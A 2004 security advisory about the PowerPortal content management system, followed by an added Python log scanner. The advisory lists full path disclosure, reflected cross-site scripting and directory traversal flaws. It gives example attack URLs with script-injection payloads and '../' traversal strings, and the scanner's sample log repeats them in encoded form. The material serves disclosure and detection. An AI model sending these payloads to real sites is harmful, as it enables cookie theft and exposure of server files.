http://www.swp-zone.org/archivos/advisory-07.txt
-------------------------------------------------------------------------------
              :.: Multiple vulnerabilities PowerPortal :.:

PROGRAM:  PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION:  v1.x
BUG:      Multiple vulnerabilities
DATE:     23/05/2004
AUTHOR:   DarkBicho
          web:   http://www.darkbicho.tk
          team:  Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@peru.com
-------------------------------------------------------------------------------

1.- Affected software description:
    ------------------------------

    PowerPortal is a popular content management system, written in php

2.- Vulnerabilities:
    ---------------

    A. Full path disclosure:

       This vulnerability would allow a remote user to determine the full
       path to the web root directory and other potentially sensitive
       information.

       :.: Examples:

       * http://attacker/modules/gallery/resize.php

         Warning: imagecreatetruecolor(): Invalid image dimensions in c:\appserv\www\power\modules\gallery\resize.php on line 18

         Warning: imagecopyresized(): supplied argument is not a valid Image resource in c:\appserv\www\power\modules\gallery\resize.php on line 20

         Warning: imagejpeg(): supplied argument is not a valid Image resource in c:\appserv\www\power\modules\gallery\resize.php on line 23

       * http://attacker/power/modules.php?na...iles=darkbicho

         Warning: opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho): failed to open dir: Invalid argument in c:\appserv\www\power\modules\gallery\index.php on line 99

    B. Cross-Site Scripting aka XSS:

       http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>

       http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results

       http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results

       http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>

    C. Arbitrary directory browsing:

       * http://attacker/modules.php?name=gal...les=/../../../

3.- SOLUTION:
    ---------

    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. Check the PowerPortal website for updates and official
    release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce

    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

    WEB:   http://www.darkbicho.tk
    EMAIL: darkbicho@peru.com

-------------------------------------------------------------------------------
        Security Wari Projects (c) 2002 - 2004 Made in Peru
----------------------------------------[ EOF
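A defender-side check for the request patterns listed in section 2, as an added example that is not part of the original advisory: it scans web access logs for requests matching findings A, B and C, decoding parameters twice so double-encoded input is caught. The log lines are constructed samples; the Apache-style log format, the finding labels and the rule that `resize.php` is flagged only when requested without a query string are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters that carry markup or paths in the advisory's example URLs.
XSS_PARAMS = {"id", "search", "files"}
MARKUP = re.compile(r"[<>]")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (assumed Apache common log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/May/2004:10:00:01 -0500] "GET /modules.php?name=gallery HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/May/2004:10:00:05 -0500] "GET /modules/gallery/resize.php HTTP/1.1" 200 412',
    '198.51.100.7 - - [23/May/2004:10:00:09 -0500] "GET /modules.php?name=links&search=%3Cscript%3Ealert(document.cookie);%3C/script%3E&func=search_results HTTP/1.1" 200 2048',
    '198.51.100.7 - - [23/May/2004:10:00:12 -0500] "GET /modules.php?name=gallery&files=%252e%252e/%252e%252e/ HTTP/1.1" 200 3071',
]

def classify(target):
    """Return the set of advisory findings (A, B, C) that a request target matches."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    hits = set()
    # A: the advisory's warnings come from calling resize.php directly with no arguments.
    if path.endswith("/modules/gallery/resize.php") and not parts.query:
        hits.add("A-path-disclosure")
    if path.endswith("/modules.php"):
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                value = unquote(value)  # second decode catches double-encoded input
                if name in XSS_PARAMS and MARKUP.search(value):
                    hits.add("B-xss")
                if name == "files" and TRAVERSAL.search(value):
                    hits.add("C-dir-browsing")
    return hits

def scan(lines):
    """Yield (client_ip, findings, target) for each log line that matches a finding."""
    for line in lines:
        m = REQUEST.search(line)
        hits = classify(m.group(1)) if m else set()
        if hits:
            yield line.split(" ", 1)[0], sorted(hits), m.group(1)

if __name__ == "__main__":
    for ip, findings, target in scan(SAMPLE_LOG):
        print(ip, ",".join(findings), target)
```

The second path-disclosure example (a nonexistent `files` directory) cannot be told apart from a normal gallery request in the log alone; it shows up only in the PHP error output.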